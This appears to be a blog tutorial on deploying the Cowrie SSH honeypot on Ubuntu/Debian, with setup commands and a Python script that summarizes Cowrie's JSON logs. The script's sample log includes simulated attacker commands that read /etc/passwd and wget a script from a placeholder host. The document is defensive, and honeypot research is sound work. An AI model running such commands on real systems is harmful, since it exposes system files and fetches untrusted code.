Sleepless Nights with auth.log: When Passive Defense Isn’t Enough
If you’re running a Linux VPS, try typing the command grep 'Failed password' /var/log/auth.log | wc -l. The resulting number might shock you. At 2 AM, I sat watching thousands of failed login attempts pouring in from IP ranges all over the globe. It was a mix of frustration—knowing the server was wasting resources handling brute-force attacks—and curiosity: If they actually got in, what would they do next? Install a crypto-mining script, build a botnet, or attempt privilege escalation?
Just installing Fail2Ban or changing the SSH port is merely a defensive measure. As a tech enthusiast, I wanted to be more proactive. I wanted to dissect their toolkit firsthand and see exactly how they operate within a shell. That’s why I decided to set up a trap called a Honeypot.
Comparing Practical Brute-Force Countermeasures
Before building the trap, I considered several common approaches used in production environments:
- Using Fail2Ban/IPTable: Secure and extremely common. However, it’s like chasing away a thief without knowing what they intended to steal. Next time, they’ll just return with a different IP.
- Changing the SSH Port (Security by Obscurity): Moving port 22 to 2222 or 9999. This filters out 95% of cheap automated scanning scripts. But for professionals, it only takes two seconds of running Nmap to find the new port.
- Setting up a Honeypot with Cowrie: This is the counter-move. You leave port 22 exposed. The hacker thinks they’ve hit the jackpot and successfully logs in, but in reality, they are lost in a simulated maze. Here, every keystroke and wget command is logged in full detail.
Why Cowrie is the Top Choice
Cowrie is a Medium Interaction Honeypot. It doesn’t provide a real operating system, which prevents the risk of a hacker gaining full control to attack others. Instead, it simulates a shell with extreme sophistication.
The hacker will see a Debian or Ubuntu system with a complete fake file system. They can freely cd, ls, or cat /etc/passwd. The most interesting feature is session replay. You can watch every step of their command-line struggle as if you were watching a live video recording.
Step-by-Step: Setting Up a Cowrie Trap on Ubuntu/Debian
To deploy this safely, you should use a separate VPS. A configuration with just 1 vCPU and 1GB of RAM is more than enough to get started.
Step 1: Move the Real SSH to a Different Port
We will yield port 22 to the Honeypot. Therefore, the first task is to move the server’s actual SSH service to an unconventional port to avoid falling into our own trap.
sudo nano /etc/ssh/sshd_config
Find the line Port 22 and change it to Port 2222. To generate a strong password for the account you will log in with on this port, I usually visit toolcraft.app/en/tools/security/password-generator. This tool runs 100% in the browser, so there’s no risk of the password leaking over the network.
Restart the SSH service to apply the changes:
sudo systemctl restart ssh
Pro tip: Remember to open port 2222 on your Firewall before logging out, or you will be permanently locked out of your server.
Step 2: Set Up a Dedicated User
Never run a Honeypot with root privileges. This is the most basic security rule.
# Install supporting libraries
sudo apt-get update
sudo apt-get install git python3-virtualenv libssl-dev libffi-dev build-essential libpython3-dev python3-minimal authbind virtualenv -y
# Create a dedicated user for the trap
sudo adduser --disabled-password cowrie
Switch to the newly created user:
sudo su - cowrie
Step 3: Installing Cowrie
Download the source code from GitHub and set up a virtual environment (virtualenv) to avoid messing up system libraries:
git clone https://github.com/cowrie/cowrie
cd cowrie
virtualenv --python=python3 cowrie-env
source cowrie-env/bin/activate
pip install --upgrade pip
pip install -r requirements.txt
Step 4: Configuration and Opening the Gates
By default, Cowrie runs on port 22222. You need to create a custom configuration file from the template:
cp etc/cowrie.cfg.dist etc/cowrie.cfg
nano etc/cowrie.cfg
You can change the hostname to something enticing like db-prod-cluster to lure hackers. Then, activate Cowrie:
bin/cowrie start
Finally, use iptables to redirect all traffic from the standard port 22 to Cowrie’s port:
sudo iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-port 22222
Reading the Attacker’s Mind: Harvesting Malware and Watching Replays
Just about 30 minutes after opening the trap, you’ll see visitors starting to pour in. To monitor logs in real-time, check the JSON file:
tail -f ~/cowrie/var/log/cowrie/cowrie.json
When someone downloads a file via wget or curl, Cowrie automatically captures it and saves it in the var/lib/cowrie/downloads/ directory. I’ve caught Mirai botnet scripts hundreds of lines long. They are so sophisticated that they even check if the server is a Honeypot before executing.
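A small analyzer for the cowrie.json log described above, added here as an example that is not part of the original post or of Cowrie itself. It groups events per session (credentials tried, commands typed, files fetched) and ranks the most-tried credential pairs; the event ids and field names are the ones Cowrie emits, while the session ids, IPs, URL and hash in the embedded sample are constructed.

```python
import json
from collections import defaultdict

# Constructed sample in Cowrie's one-JSON-object-per-line format (event ids and field names as Cowrie emits them).
SAMPLE_LOG = """\
{"eventid":"cowrie.login.failed","session":"a1b2c3","src_ip":"203.0.113.7","username":"root","password":"123456","timestamp":"2024-01-01T02:00:02Z"}
{"eventid":"cowrie.login.success","session":"a1b2c3","src_ip":"203.0.113.7","username":"root","password":"admin","timestamp":"2024-01-01T02:00:03Z"}
{"eventid":"cowrie.command.input","session":"a1b2c3","src_ip":"203.0.113.7","input":"cat /etc/passwd","timestamp":"2024-01-01T02:00:04Z"}
{"eventid":"cowrie.command.input","session":"a1b2c3","src_ip":"203.0.113.7","input":"wget http://example.invalid/x.sh","timestamp":"2024-01-01T02:00:05Z"}
{"eventid":"cowrie.session.file_download","session":"a1b2c3","src_ip":"203.0.113.7","url":"http://example.invalid/x.sh","shasum":"PLACEHOLDER_SHA256","outfile":"var/lib/cowrie/downloads/PLACEHOLDER_SHA256","timestamp":"2024-01-01T02:00:06Z"}
{"eventid":"cowrie.login.failed","session":"d4e5f6","src_ip":"198.51.100.9","username":"admin","password":"admin","timestamp":"2024-01-01T02:01:00Z"}
{"eventid":"cowrie.login.failed","session":"d4e5f6","src_ip":"198.51.100.9","username":"root","password":"123456","timestamp":"2024-01-01T02:01:01Z"}
"""

def summarize(lines):
    """Group Cowrie events by session id: source IP, credentials tried (with success flag), commands, downloads."""
    sessions = defaultdict(lambda: {"src_ip": None, "logins": [], "commands": [], "downloads": []})
    for raw in lines:
        raw = raw.strip()
        if not raw:
            continue
        try:
            ev = json.loads(raw)
        except json.JSONDecodeError:
            continue  # a half-written line handed over by tail -f; skip it
        s = sessions[ev.get("session", "unknown")]
        s["src_ip"] = ev.get("src_ip", s["src_ip"])
        eid = ev.get("eventid", "")
        if eid in ("cowrie.login.failed", "cowrie.login.success"):
            s["logins"].append((ev.get("username"), ev.get("password"), eid.endswith("success")))
        elif eid == "cowrie.command.input":
            s["commands"].append(ev.get("input", ""))
        elif eid == "cowrie.session.file_download":
            s["downloads"].append((ev.get("url"), ev.get("shasum")))
    return dict(sessions)

def top_credentials(sessions, n=5):
    """Most frequently tried username/password pairs across all sessions, highest count first."""
    counts = defaultdict(int)
    for s in sessions.values():
        for user, pw, _ in s["logins"]:
            counts[(user, pw)] += 1
    return sorted(counts.items(), key=lambda kv: -kv[1])[:n]

if __name__ == "__main__":
    sessions = summarize(SAMPLE_LOG.splitlines())
    for sid, s in sessions.items():
        print(sid, s["src_ip"], len(s["logins"]), s["commands"], s["downloads"])
    print(top_credentials(sessions))
```

To run it against a live trap, call summarize(open("var/log/cowrie/cowrie.json")) from the cowrie directory instead of the embedded sample.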
To replay the entire session of a hacker “messing around,” use the command:
bin/playlog var/lib/cowrie/tty/<logfile_id>
There’s a real sense of satisfaction in watching a hacker struggle to type commands to install a rootkit on a non-existent virtual machine. It provides many lessons on the attacker’s mindset that books can hardly describe.
Experimenting with a Honeypot isn’t just for entertainment. It helped me realize that modern attacks are mostly highly automated. If you use a weak password, it takes less than 5 seconds for a bot to take control. I hope this experience gives you a more proactive perspective on protecting your Linux systems.